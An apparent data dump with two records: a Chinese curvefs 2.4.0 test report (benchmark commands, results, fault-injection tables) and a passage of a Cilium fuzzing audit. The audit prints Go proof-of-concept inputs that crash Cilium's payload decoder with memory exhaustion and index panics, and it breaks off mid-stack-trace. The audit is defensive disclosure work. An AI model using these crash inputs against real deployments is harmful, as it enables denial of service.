[ { "data": "© XXX Page 1 of 21curvefs 2.4.0版本总体测试© XXX Page 2 of 21 \n一、遗留问题列表\n二、测试内容和结论概述\n三、测试要点\n四、测试结论\n五、详细测试数据及监控数据\n5.1 常规测试\n5.1.1 文件系统POSIX 接口\n5.1.1.1 pjdtest\n5.1.1.2 ltp-fsstress\n测试结果:\n5.1.2 元数据项& 数据属性\n5.1.2.1 dbench\n5.1.2.2 iozone\n5.1.2.3 mdtest\n5.1.2.4 rename 测试用例集\n5.1.2.5 xfstest\n5.1.3 数据一致性测试\n5.1.3.1 编译项目或者内核\n5.1.3.2 vdbench读写一致性测试\n5.2 异常测试\n5.3 新增功能测试\n5.3.1 warmup测试\n5.3.1.1 cto open\n5.3.1.1.1 静态warmup\n5.3.1.1.2 同时有读写时warmup\n5.3.1.1.2.1 缓存盘容量不足时\n5.3.1.1.2.1.1 大文件(根据缓存盘容量)并发操作\n5.3.1.1.2.1.2 大规模目录(1000w+)\n5.3.1.1.2.2 缓存盘容量足够时\n5.3.1.1.2.2.1 大文件(根据缓存盘容量)并发操作\n5.3.1.1.2.2.2 大规模目录(1000w+)\n5.4 回归测试\n一、遗留问题列表\n问题列表 \n  风险项 ISSUE.No 负责人 严重级别 是否解决 是否需要回归 回归人 是否回归通过 应急预案 备注\n二、测试内容和结论概述\n测试节点硬件配置与软件版本\n环境信息 稳定性测试环境 9个机器© XXX Page 3 of 211. \n2. CPU Intel(R) Xeon(R) CPU E5-2680 v4 @ 2.40GHz\n内存 256G\n网卡\nIntel Corporation I350 Gigabit Network Connection\nIntel Corporation 82599EB 10-Gigabit SFI/SFP+\n操作系统 发行版:Debian GNU/Linux 9\n \n内核 4.19.87-netease6-1 #2 SMP Mon Sep 7 07:50:31\n用途 计算节点\ncurvefs版本 2.1.0\n部署方式\ns3 nos\n镜像 harbor.cloud.netease.com/curve/curvefs:citest\ndisk cache INTEL SSDSC2BB80 800G\nmetaserver数据 ssd 混合部署\nmds ssd 混合部署\netcd ssd 混合部署\ncurveadm版本 0.1.0\n三、测试要点\n1、warmup相关功能、异常、性能测试\n2、cto相关问题修复© XXX Page 4 of 213、copysets数据均衡性\n4、新版本sdk稳定性和性能\n四、测试结论\n五、详细测试数据及监控数据\n5.1 常规测试\n5.1.1 文件系统POSIX 接口\n5.1.1.1 pjdtest\n已在ci中测试。\n5.1.1.2 ltp-fsstress\n测试程序: ltp-full-20220930.tar.bz2\n测试步骤:© XXX Page 5 of 21set -ex\nmkdir -p fsstress\npushd fsstress\nwget -q -O ltp-full.tgz http://59.111.93.102:8080/qa/ltp-full.tgz // \ntar xzf ltp-full.tgz\npushd ltp-full-20091231/testcases/kernel/fs/fsstress\nmake\nBIN=$(readlink -f fsstress)\npopd\npopd\nT=$(mktemp -d -p .)\n\"$BIN\" -d \"$T\" -l 1 -n 1000 -p 10 -v\necho $?\nrm -rf -- \"$T\"\n测试结果:\nsuccess\n5.1.2 元数据项& 数据属性\n5.1.2.1 dbench\ndbench\n执行命令:\nsudo dbench -t 600 -D ltp-full-20220930 -c /usr/share/dbench/client.txt 10\n结果:© XXX Page 6 of 21Operation Count AvgLat MaxLat\n ----------------------------------------\n NTCreateX 111856 12.154 910.045\n Close 82175 9.680 413.501\n Rename 4735 422.706 2669.516\n Unlink 22549 11.286 824.908\n Qpathinfo 101390 6.440 747.853\n Qfileinfo 17699 0.019 0.108\n Qfsinfo 18549 1.130 149.004\n Sfileinfo 9053 5.291 290.058\n Find 39162 14.795 877.050\n WriteX 55122 0.076 4.072\n ReadX 175813 0.119 56.392\n LockX 366 0.005 0.019\n UnlockX 366 0.002 0.023\n Flush 7764 33.910 156.470\nThroughput 5.82144 MB/sec 10 clients 10 procs max_latency=2669.523 ms\n5.1.2.2 iozone\n测试步骤:\niozone -a -n 1g -g 4g -i 0 -i 1 -i 2 -i 3 -i 4 -i 5 -i 8 -f testdir -Rb log.xls\niozone -c -e -s 1024M -r 16K -t 1 -F testfile -i 0 -i 1\niozone -c -e -s 1024M -r 1M -t 1 -F testfile -i 0 -i 1\niozone -c -e -s 10240M -r 1M -t 1 -F testfile -i 0 -i 1\n测试结果:\niozone -a -n 1g -g 4g -i 0 -i 1 -i 2 -i 3 -i 4 -i 5 -i 8 -f testdir -Rb log.xls client © XXX Page 7 of 21\niozone -c -e -s 1024M -r 16K -t 1 -F testfile -i 0 -i 1\niozone -c -e -s 1024M -r 16K -t 1 -F testfile -i 0 -i 1 \n Iozone: Performance Test of File I/O \n Version $Revision: 3.429 $ \n Compiled for 64 bit mode. \n Build: linux-AMD64 \n \n Contributors:William Norcott, Don Capps, Isom Crawford, Kirby Collins \n Al Slater, Scott Rhine, Mike Wisner, Ken Goss \n Steve Landherr, Brad Smith, Mark Kelly, Dr. 
Alain CYR, \n Randy Dunlap, Mark Montague, Dan Million, Gavin Brebner,\n Jean-Marc Zucconi, Jeff Blomberg, Benny Halevy, Dave Boone,© XXX Page 8 of 21 Erik Habbinga, Kris Strecker, Walter Wong, Joshua Root,\n Fabrice Bacchella, Zhenghua Xue, Qin Li, Darren Sawyer,\n Vangel Bojaxhi, Ben England, Vikentsi Lapa.\n \n Run began: Thu Dec 1 10:18:38 2022\n \n Include close in write timing \n Include fsync in write timing\n File size set to 1048576 kB \n Record Size 16 kB \n Command line used: iozone -c -e -s 1024M -r 16K -t 1 -F testfile -i 0 -i 1\n Output is in kBytes/sec \n Time Resolution = 0.000001 seconds.\n Processor cache size set to 1024 kBytes. \n Processor cache line size set to 32 bytes.\n File stride size set to 17 * record size. \n Throughput test with 1 process \n Each process writes a 1048576 kByte file in 16 kByte records \n \n Children see throughput for 1 initial writers = 91503.61 kB/sec\n Parent sees throughput for 1 initial writers = 91501.71 kB/sec\n Min throughput per process = 91503.61 kB/sec\n Max throughput per process = 91503.61 kB/sec\n Avg throughput per process = 91503.61 kB/sec\n Min xfer = 1048576.00 kB © XXX Page 9 of 21 \n Children see throughput for 1 rewriters = 90770.86 kB/sec\n Parent sees throughput for 1 rewriters = 90768.49 kB/sec\n Min throughput per process = 90770.86 kB/sec\n Max throughput per process = 90770.86 kB/sec\n Avg throughput per process = 90770.86 kB/sec\n Min xfer = 1048576.00 kB \n \n Children see throughput for 1 readers = 167221.64 kB/sec\n Parent sees throughput for 1 readers = 167213.43 kB/sec\n Min throughput per process = 167221.64 kB/sec\n Max throughput per process = 167221.64 kB/sec\n Avg throughput per process = 167221.64 kB/sec\n Min xfer = 1048576.00 kB \n \n Children see throughput for 1 re-readers = 1047344.44 kB/sec\n Parent sees throughput for 1 re-readers = 1047067.22 kB/sec\n Min throughput per process = 1047344.44 kB/sec\n Max throughput per process = 1047344.44 kB/sec\n Avg throughput per process = 1047344.44 kB/sec\n Min xfer = 1048576.00 kB© XXX Page 10 of 21© XXX Page 11 of 21iozone test complete.\niozone -c -e -s 1024M -r 1M -t 1 -F testfile -i 0 -i 1\nInclude close in write timing\n Include fsync in write timing\n File size set to 1048576 kB\n Record Size 1024 kB\n Command line used: iozone -c -e -s 1024M -r 1M -t 1 -F testfile -i 0 -i 1\n Output is in kBytes/sec\n Time Resolution = 0.000001 seconds.\n Processor cache size set to 1024 kBytes.\n Processor cache line size set to 32 bytes.\n File stride size set to 17 * record size.\n Throughput test with 1 process\n Each process writes a 1048576 kByte file in 1024 kByte records\n Children see throughput for 1 initial writers = 96521.59 kB/sec\n Parent sees throughput for 1 initial writers = 96519.08 kB/sec© XXX Page 12 of 21 Min throughput per process = 96521.59 kB/sec\n Max throughput per process = 96521.59 kB/sec\n Avg throughput per process = 96521.59 kB/sec\n Min xfer = 1048576.00 kB\n Children see throughput for 1 rewriters = 96529.34 kB/sec\n Parent sees throughput for 1 rewriters = 96526.59 kB/sec\n Min throughput per process = 96529.34 kB/sec\n Max throughput per process = 96529.34 kB/sec\n Avg throughput per process = 96529.34 kB/sec\n Min xfer = 1048576.00 kB\n Children see throughput for 1 readers = 182745.86 kB/sec\n Parent sees throughput for 1 readers = 182734.62 kB/sec\n Min throughput per process = 182745.86 kB/sec\n Max throughput per process = 182745.86 kB/sec\n Avg throughput per process = 182745.86 kB/sec\n Min xfer = 1048576.00 kB© XXX Page 13 
of 21 Children see throughput for 1 re-readers = 1692895.88 kB/sec\n Parent sees throughput for 1 re-readers = 1691925.45 kB/sec\n Min throughput per process = 1692895.88 kB/sec\n Max throughput per process = 1692895.88 kB/sec© XXX Page 14 of 21 Avg throughput per process = 1692895.88 kB/sec\n Min xfer = 1048576.00 k \niozone -c -e -s 10240M -r 1M -t 1 -F testfile -i 0 -i 1\nInclude close in write timing \n Include fsync in write timing \n File size set to 10485760 kB \n Record Size 1024 kB\n Command line used: iozone -c -e -s 10240M -r 1M -t 1 -F testfile -i 0 -i 1\n Output is in kBytes/sec \n Time Resolution = 0.000001 seconds. \n Processor cache size set to 1024 kBytes. \n Processor cache line size set to 32 bytes. \n File stride size set to 17 * record size. \n Throughput test with 1 process\n Each process writes a 10485760 kByte file in 1024 kByte records \n \n Children see throughput for 1 initial writers = 99574.78 kB/sec\n Parent sees throughput for 1 initial writers = 99574.60 kB/sec\n Min throughput per process = 99574.78 kB/sec\n Max throughput per process = 99574.78 kB/sec\n Avg throughput per process = 99574.78 kB/sec\n Min xfer = 10485760.00 kB \n \n Children see throughput for 1 rewriters = 104966.91 kB/sec© XXX Page 15 of 21 Parent sees throughput for 1 rewriters = 104966.63 kB/sec\n Min throughput per process = 104966.91 kB/sec\n Max throughput per process = 104966.91 kB/sec\n Avg throughput per process = 104966.91 kB/sec\n Min xfer = 10485760.00 kB\n Children see throughput for 1 readers = 183532.78 kB/sec\n Parent sees throughput for 1 readers = 183532.05 kB/sec\n Min throughput per process = 183532.78 kB/sec\n Max throughput per process = 183532.78 kB/sec\n Avg throughput per process = 183532.78 kB/sec\n Min xfer = 10485760.00 kB\n Children see throughput for 1 re-readers = 1674970.38 kB/sec\n Parent sees throughput for 1 re-readers = 1674905.61 kB/sec\n Min throughput per process = 1674970.38 kB/sec\n Max throughput per process = 1674970.38 kB/sec© XXX Page 16 of 21 Avg throughput per process = 1674970.38 kB/sec\n Min xfer = 10485760.00 kB\n5.1.2.3 mdtest\n测试步骤:\n# \nfor i in 4 8 16;do mpirun --allow-run-as-root -np $i mdtest -z 2 -b 3 -I 10000 -d\n/home/nbs/failover/test2/iozone;done\n# \nmpirun --allow-run-as-root -np mdtest -C -F -L -z 4 -b 10 -I 10000 -d /home/nbs/failover/test1 -w 1024\n5.1.2.4 rename 测试用例集\n暂无\n5.1.2.5 xfstest\n测试步骤:© XXX Page 17 of 21#!/bin/sh -x\nset -e\nwget http://59.111.93.102:8080/qa/fsync-tester.c\ngcc -D_GNU_SOURCE fsync-tester.c -o fsync-tester\n./fsync-tester\necho $PATH\nwhereis lsof\nlsof\n5.1.3 数据一致性测试\n5.1.3.1 编译项目或者内核\n测试步骤:© XXX Page 18 of 21# linux \n#!/usr/bin/env bash\nset -e\nwget -O linux.tar.gz http://59.111.93.102:8080/qa/linux-5.4.tar.gz\nsudo apt-get install libelf-dev bc -y\nmkdir t\ncd t\ntar xzf ../linux.tar.gz\ncd linux*\nmake defconfig\nmake -j`grep -c processor /proc/cpuinfo`\ncd ..\nif ! 
rm -rv linux* ; then\n echo \"uh oh rm -r failed, it left behind:\"\n find .\n exit 1\nfi\ncd ..\nrm -rv t linux*\n5.1.3.2 vdbench读写一致性测试\n测试步骤:\nfsd=fsd1,anchor=/home/nbs/failover/test1,depth=1,width=10,files=10,sizes=(100m,0),shared=yes,openflags=o_direct\nfwd=fwd1,fsd=fsd1,threads=10,xfersize=(512,20,4k,20,64k,20,512k,20,1024k,20),fileio=random,fileselect=random,rdp\nct=50\nrd=rd1,fwd=fwd*,fwdrate=max,format=restart,elapsed=2000000,interval=1\nexec : ./vdbench -f profile -jn\n5.2 异常测试© XXX Page 19 of 21操作 影响\n1个etcd\\mds\\metaserver 网络拔出  \nclient 网络拔出  \nclient节点丢包  \nkill etcd 后重启  \nkill mds 后重启  \nkill metaserver 后重启  \nmetaserver 数据迁出  \n一个metasever掉电  \n丢包10%  \n丢包30%  \n主etcd掉电  \n主mds掉电  \n增加metaserver数据迁入  \n网络延时300ms  \n5.3 新增功能测试\n5.3.1 warmup测试\n5.3.1.1 cto open\n5.3.1.1.1 静态warmup\n参考   中的 fs文件系统/2.4.0版本自测用例/预热数据 http://eq.hz.netease.com//#/useCaseManag/list?projectId=1155&moduleid=9870838\n5.3.1.1.2 同时有读写时warmup© XXX Page 20 of 215.3.1.1.2.1  缓存盘容量不足时\n可以预先在缓存盘里创建一个大文件占据缓存盘容量,人为制造缓存盘容量不足,校验文件md5一致性\n5.3.1.1.2.1.1 大文件(根据缓存盘容量)并发操作\n操作 结论\n挂卸载 fuse  \n其他文件并发读写  \n单metaserver异常(kill)  \n多挂载,不共用缓存盘,并发warmup同一文件  \n多挂载,共用缓存盘,并发warmup同一文件  \n多挂载,共用缓存盘,并发warmup不同文件  \n5.3.1.1.2.1.2  大规模目录(1000w+)\n操作 结论\n挂卸载 fuse  \n其他目录并发读写  \n单metaserver异常(kill)  \n多挂载,不共用缓存盘,并发warmup同一目录  \n多挂载,共用缓存盘,并发warmup同一目录  \n多挂载,共用缓存盘,并发warmup不同目录  \n5.3.1.1.2.2  缓存盘容量足够时\n5.3.1.1.2.2.1 大文件(根据缓存盘容量)并发操作\n操作 结论\n挂卸载 fuse  © XXX Page 21 of 21其他文件并发读写  \n单metaserver异常(kill)  \n多挂载,不共用缓存盘,并发warmup同一文件  \n多挂载,共用缓存盘,并发warmup同一文件  \n多挂载,共用缓存盘,并发warmup不同文件  \n5.3.1.1.2.2.2  大规模目录(1000w+)\n操作 结论\n挂卸载 fuse  \n其他目录并发读写  \n单metaserver异常(kill)  \n多挂载,不共用缓存盘,并发warmup同一目录  \n多挂载,共用缓存盘,并发warmup同一目录  \n多挂载,共用缓存盘,并发warmup不同目录  \n5.4 回归测试\nhttps://github.com/opencurve/curve/issues/1833\nhttps://github.com/opencurve/curve/issues/1841\nhttps://github.com/opencurve/curve/issues/1842\nhttps://github.com/opencurve/curve/issues/1881" } ]
{ "category": "Runtime", "file_name": "CiliumFuzzingAudit2022.pdf", "project_name": "Cilium", "subcategory": "Cloud Native Network" }
[ { "data": "P R E S E N T S \nC i l i u m F u z z i n g A u d i t\nIn collaboration with the Cilium project maintainers and The Linux Foundation\nA u t h o r s\nAdam Korczynski <\nadam@adalogics.com\n>\nDavid Korczynski <\ndavid@adalogics.com\n>\nDate: 13th February, 2023\nThis report is licensed under Creative Commons 4.0 (CC BY 4.0)\n1\nCilium Fuzzing Audit, 2022\nCNCF security and fuzzing audits\nThis report details a fuzzing audit commissioned by the CNCF and the engagement is part\nof the broader efforts carried out by CNCF in securing the so\u0000ware in the CNCF landscape.\nDemonstrating and ensuring the security of these so\u0000ware packages is vital for the CNCF\necosystem and the CNCF continues to use state of the art techniques to secure its projects\nas well as carrying out manual audits. Over the last handful of years, CNCF has been\ninvesting in security audits, fuzzing and so\u0000ware supply chain security that has helped\nproactively discover and fix hundreds of issues.\nFuzzing is a proven technique for finding security and reliability issues in so\u0000ware and the\nefforts so far have enabled fuzzing integration into more than twenty CNCF projects\nthrough a series of dedicated fuzzing audits. In total, more than 350 bugs have been found\nthrough fuzzing of CNCF projects. The fuzzing efforts of CNCF have focused on enabling\ncontinuous fuzzing of projects to ensure continued security analysis, which is done by way\nof the open source fuzzing project OSS-Fuzz\n1\n.\nCNCF continues work in this space and will further increase investment to improve\nsecurity across its projects and community. The focus for future work is integrating fuzzing\ninto more projects, enabling sustainable fuzzer maintenance, increasing maintainer\ninvolvement and enabling fuzzing to find more vulnerabilities in memory safe languages.\nMaintainers who are interested in getting fuzzing integrated into their projects or have\nquestions about fuzzing are encouraged to visit the dedicated cncf-fuzzing repository\nhttps://github.com/cncf/cncf-fuzzing\nwhere questions\nand queries are welcome.\n1\nhttps://github.com/google/oss-fuzz\n2Cilium Fuzzing Audit, 2022\nEx ecutive summary\nIn this engagement, Ada Logics worked on improving Ciliums fuzzing suite. At the time of this\nengagement, Cilium was already integrated into OSS-Fuzz, and the goal of this fuzzing audit was to\nbuild upon this integration and improve the fuzzing efforts in a continuous manner.\nThe fuzzing audit added fuzzers for a lot of data processing APIs that found a number of different\nissues in Cilium and its dependencies. None of the issues were considered critical, however, they\nrevealed some issues in Cilium that prompted rewrites and deprecation of some packages\nthroughout the source tree.\nPrior to this engagement, Ciliums OSS-Fuzz integration was set up in manner where the fuzzers\nand the OSS-Fuzz build script were located in Ciliums own repository\n2\n. In this fuzzing audit, most\ndevelopment of the fuzzers was carried out in the CNCF-Fuzzing repository,\nhttps://github.com/cncf/cncf-fuzzing/tree/main/projects/cilium\n.\nThis allowed the Ada Logics team\nto make smaller iterations of the fuzzers throughout the audit and avoid imposing the overhead of\nhaving the Cilium maintainers review trivial changes to the fuzzers. 
OSS-Fuzz was instructed to pull\nthe fuzzers from CNCF-Fuzzing in addition to the fuzzers from Ciliums repository.\nR e s u l t s s u m m a r i s e d\n14 fuzzers developed\nAll fuzzers added to Ciliums OSS-Fuzz integration\nAll fuzzers supported by Ciliums CIFuzz integration\n8 crashes were found.\n●\n5 cases of excessive memory allocation\n●\n1 index out of range\n●\n1 time out\n●\n1 nil-dereference\n2\nhttps://github.com/cilium/cilium/blob/master/test/fuzzing/oss-fuzz-build.sh\n3Cilium Fuzzing Audit, 2022\nT able of Contents\nCNCF security and fuzzing audits\n2\nExecutive summary\n3\nTable of Contents\n4\nCilium fuzzing\n5\nIssues found by fuzzers\n9\nRuntime stats\n19\nConclusions and future work\n20\n4Cilium Fuzzing Audit, 2022\nCilium fuzzing\nIn this section we present details on the Cilium fuzzing set up, and in particular the overall\nfuzzing architecture as well as the specific fuzzers developed.\nArchitecture\nA central component in the Cilium approach to fuzzing is continuous fuzzing by way of\nOSS-Fuzz. The Cilium source code and the source code for the Cilium fuzzers are the two\nkey so\u0000ware packages that OSS-Fuzz uses to fuzz Cilium. The following figure gives an\noverview of how OSS-Fuzz uses these two packages and what happens when an issue is\nfound/fixed.\nFigure 1.1: Ciliums fuzzing architecture\nThe current OSS-Fuzz set up builds the fuzzers by cloning the upstream Cilium Github\nrepository to get the latest Cilium source code and the CNCF-Fuzzing Github repository to\nget the latest set of fuzzers, and then builds the fuzzers against the cloned Cilium code. As\nsuch, the fuzzers are always run against the latest Cilium commit.\n5\nCilium Fuzzing Audit, 2022\nThis build cycle happens daily and OSS-Fuzz will verify if any existing bugs have been\nfixed. If OSS-fuzz finds that any bugs have been fixed OSS-Fuzz marks the crashes as fixed\nin the Monorail bug tracker and notifies maintainers.\nIn each fuzzing iteration, OSS-Fuzz uses its corpus accumulated from previous fuzz runs. If\nOSS-Fuzz detects any crashes when running the fuzzers, OSS-Fuzz performs the following\nactions:\n1.\nA detailed crash report is created.\n2.\nAn issue in the Monorail bug tracker is created.\n3.\nAn email is sent to maintainers with links to the report and relevant entry in the\nbug tracker.\nOSS-Fuzz has a 90 day disclosure policy, meaning that a bug becomes public in the bug\ntracker if it has not been fixed. The detailed report is never made public. The Cilium\nmaintainers will fix issues upstream, and OSS-Fuzz will pull the latest Cilium master\nbranch the next time it performs a fuzz run and verify that a given issue has been fixed.\nCilium Fuzzers\nIn this section we present a highlight of the Cilium fuzzers and which parts of Cilium they\ntest. 
In total, 14 fuzzers were written during the fuzzing audit.\nOverview\n#\nName\nPackage\n1FuzzLabelsfilterPkgcilium/pkg/labelsfilter\n2FuzzDecodeTraceNotifycilium/pkg/monitor\n3FuzzFormatEventcilium/pkg/monitor\n4FuzzPayloadEncodeDecodecilium/pkg/monitor/payload\n5FuzzElfOpencilium/pkg/elf\n6FuzzElfWritecilium/pkg/elf\n7FuzzMatchpatternValidatecilium/pkg/fqdn/matchpattern\n8FuzzMatchpatternValidateWithoutCachecilium/pkg/fqdn/matchpattern\n9FuzzParserDecodecilium/pkg/hubble/parser\n10FuzzLabelsParsecilium/pkg/k8s/slim/k8s/apis/labels\n11FuzzMultipleParserscilium/proxylib/cassandra\n12FuzzConfigParsecilium/pkg/bgp/config\n6Cilium Fuzzing Audit, 2022\n13FuzzNewVisibilityPolicycilium/pkg/policy\n14FuzzBpfcilium/pkg/bpf\nTarget APIs\n1: FuzzLabelsfilterPkg\nTests thatParseLabelPrefixCfg()\nandFilter()\nAPIs\nof thelabelsfilter\npackage.\n2: FuzzDecodeTraceNotify\nPasses an empty&TraceNotify{}\nand a pseudo-random\nbyte slice toDecodeTraceNotify()\n.\n3: FuzzFormatEvent\nCreates a pseudo-random&Payload{}\nand passes it to(m*MonitorFormatter).FormatEvent()\n.\n4: FuzzPayloadEncodeDecode\nDecodes aPayload{}\nwith a pseudo-random byte slice.\n5: FuzzElfOpen\nCreates a file with data provided by the fuzzer and opens it by way ofgithub.com/cilium/cilium/pkg/elf.Open()\n.\n6: FuzzElfWrite\nCreates a new Elf and writes pseudo-random data to it.\n7: FuzzMatchpatternValidate\nPasses a pseudo-random string togithub.com/cilium/cilium/pkg/fqdn/matchpattern.Validate()\n.\n8: FuzzMatchpatternValidateWithoutCache\nPasses a pseudo-random string togithub.com/cilium/cilium/pkg/fqdn/matchpattern.Validate()\n.\n9: FuzzParserDecode\nInstantiates a Hubble parser. It then creates aMonitorEvent\nand assigns either aPerfEvent\n,AgentEvent\nor aLostEvent\nto theMonitorEvent’sPayload\n. Finally the\nfuzzer callsgithub.com/cilium/cilium/pkg/hubble/parser.(p*Parser).Decode()\n, passing theMonitorEvent\n.\n7Cilium Fuzzing Audit, 2022\n10: FuzzLabelsParse\nPasses a pseudo-random string togithub.com/cilium/cilium/pkg/k8s/slim/k8s/apis/labels.Parse()\n.\n11: FuzzMultipleParsers\nStarts a log server, inserts a pseudo-random policy text, creates a new proxylib connection\nand callsOnData()\nagainst the connection. When creating\nthe connection, the fuzzer\nchooses between the Cassandra, Kafka, R2d2 or Memcache parsers.\n12: FuzzConfigParse\nPasses the fuzzing testcase to thebgp\nconfiguration\nparser.\n13: FuzzNewVisibilityPolicy\nCreates aVisibilityPolicy\nusing the fuzz testcase\nas the annotation parameter.\n14: FuzzBpf\nCreates two files, a “bpffFile” and an “elfFile”. Pseudo-random data is written to each file.\nThe fuzzer then calls eitherStartBPFFSMigration()\norFinalizeBPFFSMigration()\n. If it callsFinalizeBPFFSMigration()\nit may set the\nrevert argument to true.\n8Cilium Fuzzing Audit, 2022\nIssues found by fuzzers\nA total of 8 unique crashes were reported during the audit. All crashes were triaged by the\nCilium team who tracked the issues internally. 
The issues are as follows:\n#\nTitle\nMitigation\n1\nCilium Monitor: Out of memory when decoding \nspecific payload data\nClose: WontFix\n2\nCilium Monitor: index out of range\nClose: WontFix\n3\nCilium Monitor: Out of memory panic\nClose: WontFix\n4\nExcessive processing time required for rules with \nlong DNS namesFuzzPayloadEncodeDecode\nImprove Cilium limits on \nmatchpattern\n5\nExcessive memory allocation when parsing MetalLB \nconfiguration\nDeprecate feature\n6\nExcessive memory usage when loading and writing \nELF file\nAvoid reading/writing ELFs \nas part of datapath load\n7\nExcessive memory consumption when reading bytes \nof bpf_elf_map\nAvoid reading/writing ELFs \nas part of datapath load\n8\nHubble: nil-dereference in three-four parser\nCheck if nil before reading\nIssue 1-3 were closed as WontFixʼes. These were true, reproducible crashes, but triaging\nshowed that they did not have impact on real-world use cases.\nPublic Github issues were created for issue 4, 5 and 6 to fix at a future date.\nIssue 7 and 8 were fixed in Cilium.\n9Cilium Fuzzing Audit, 2022\n1: Cilium Monitor: Out of memory when decoding specific\npayload data\nOSS-Fuzz bug tracker:\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=49119\nMitigation:\nClose: WontFix\nID:\nADA-CIL-FUZZ-1\nDescription\nA fuzzer found that a well-cra\u0000ed payload data byte slice could cause excessive memory\nconsumption of the host machine.\nOSS-Fuzz took the following steps to trigger the crash. Note that this happened inside the\nOSS-Fuzz environment which has a maximum of 2560Mb memory available:\n1234567891011packagepayload\nimport(\"testing\")\nfuncTestPoC(t *testing.T) {data := []byte{251,0,99,255,255,6}pl := &Payload{}pl.Decode(data)}\nFigure 1.1:Proof of concept payload to trigger issueADA-CIL-FUZZ-1\n… which resulted in allocating 3737Mb of memory that OSS-Fuzz reported as an\nout-of-memory issue:\n0\n1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n==13== ERROR: libFuzzer: out-of-memory (used: 3336Mb; limit: 2560Mb) \nTo change the out-of-memory limit use -rss_limit_mb=<N>\nLive Heap Allocations: 24124699 bytes in 32 chunks; quarantined: 44415 bytes in 46 chunks; 7488 other chunks; total \nchunks: 7566; showing top 95% (at most 8 unique contexts) \n24120888 byte(s) (99%) in 11 allocation(s) \n#0 0x52ef96 in __interceptor_malloc /src/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:69:3 \n#1 0x4ad997 in operator new(unsigned long) cxa_noexception.cpp \n#2 0x458342 in main /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerMain.cpp:20:10 \n#3 0x7f6e83556082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: \n1878e6b475720c7c51969e69ab2d276fae6d1dee)\nFigure 1.2: Stacktrace from running the test case against the Cilium code base.\nThe function where this issue may be triggered is run from the \"cilium monitor\" command,\nwhich may be invoked inside the Cilium container by a privileged user. Cilium exercises\ncontrol over the generation and processing of these messages, so the likelihood of\nmalformed input is low. The impacted component is not a long-running process so there is\nno expected availability or observability impact. 
As a consequence of this, the issue will be\nclosed without a fix.\n10Cilium Fuzzing Audit, 2022\n2: Cilium Monitor: index out of range\nOSS-Fuzz bug tracker:\nhttps://bugs.chromium.org/p/oss-fuzz/issues/detail?id=49723\nMitigation:\nClose: WontFix\nID:\nADA-CIL-FUZZ-2\nDescription\nAn index out of range panic in Golangsgob\npackage\nwas triggerable from Ciliums payload\npackage when decoding aPayload\nwith a particularly\nwell-crafted testcase.\nProof of concept\nThe following test reproduces the issue. The key lines are 8 and 10, where line 8 contains\nthe payload and line 10 the entry point that causes the panic. The data produced on line 8\ncorresponds to the data generated by the fuzzer.\n123456789101112packagepayload\nimport(\"testing\")\nfuncTestPoC(t *testing.T) {data := []byte{18,127,255,2,0,248,127,255,255,255,255,255,255,255,255,255,25,67,36}pl := &Payload{}pl.Decode(data)}\nFigure 2.1:Proof of concept payload to trigger issueADA-CIL-FUZZ-2\nTo reproduce the issue the above test can be run against Cilium main branch commitb4794d690b5690d70c074bffd1db7593e3938e65\nby placing\nthe test inside thepkg/monitor/payload\ndirectory:\n1234git clone https://github.com/cilium/ciliumcd ciliumgit checkout b4794d690b5690d70c074bffd1db7593e3938e65cd pkg/monitor/payload\nFigure 2.2: Extracting the relevant commit of Cilium to reproduce ADA-CIL-FUZZ-2\nCreate the test aspoc_test.go\nwith the contents of\nthe test above and then rungo test-run=TestPoC\n. You should get the following stacktrace:\n11Cilium Fuzzing Audit, 2022\n0\n1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n11\n12\n13\n14\n15\n16\n17\n18\n19\n20\n21\n22\n23\n24\n25\n26\n27\n28\n29\n30\n31\n32\n33\n34\npanic: runtime error: index out of range [-9223372036854775808] [recovered] \npanic: runtime error: index out of range [-9223372036854775808] [recovered] \npanic: runtime error: index out of range [-9223372036854775808]\ngoroutine 19 [running]: \ntesting.tRunner.func1.2({0x653040, 0xc00015e048}) \n/usr/local/go/src/testing/testing.go:1396 +0x24e \ntesting.tRunner.func1() \n/usr/local/go/src/testing/testing.go:1399 +0x39f \npanic({0x653040, 0xc00015e048}) \n/usr/local/go/src/runtime/panic.go:884 +0x212 \nencoding/gob.catchError(0xc00016c1f0) \n/usr/local/go/src/encoding/gob/error.go:38 +0x6d \npanic({0x653040, 0xc00015e048}) \n/usr/local/go/src/runtime/panic.go:884 +0x212 \nencoding/gob.(*Decoder).decodeStruct(0xc00016c180?, 0xc00015c180, {0x655440?, 0xc0001ae0c0?, 0x4ec2ef?}) \n/usr/local/go/src/encoding/gob/decode.go:462 +0x2cc \nencoding/gob.(*Decoder).decodeValue(0xc00016c180, 0x485f0?, {0x62bc00?, 0xc0001ae0c0?, 0xc00016c198?}) \n/usr/local/go/src/encoding/gob/decode.go:1210 +0x24e \nencoding/gob.(*Decoder).recvType(0xc00016c180, 0x40) \n/usr/local/go/src/encoding/gob/decoder.go:67 +0x13c \nencoding/gob.(*Decoder).decodeTypeSequence(0xc00016c180, 0x0) \n/usr/local/go/src/encoding/gob/decoder.go:164 +0x7b \nencoding/gob.(*Decoder).DecodeValue(0xc00016c180, {0x644540?, 0xc000115230?, 0x8?}) \n/usr/local/go/src/encoding/gob/decoder.go:225 +0x18f \nencoding/gob.(*Decoder).Decode(0xc00016c180, {0x644540?, 0xc000115230?}) \n/usr/local/go/src/encoding/gob/decoder.go:202 +0x165 \ngithub.com/cilium/cilium/pkg/monitor/payload.(*Payload).DecodeBinary(...) \n/tmp/cilium/pkg/monitor/payload/monitor_payload.go:98 \ngithub.com/cilium/cilium/pkg/monitor/payload.(*Payload).ReadBinary(0x5007b4?, {0x6bc800?, 0xc000115260?}) \n/tmp/cilium/pkg/monitor/payload/monitor_payload.go:82 +0x3f \ngithub.com/cilium/cilium/pkg/monitor/payload.(*Payload).Decode(...) 
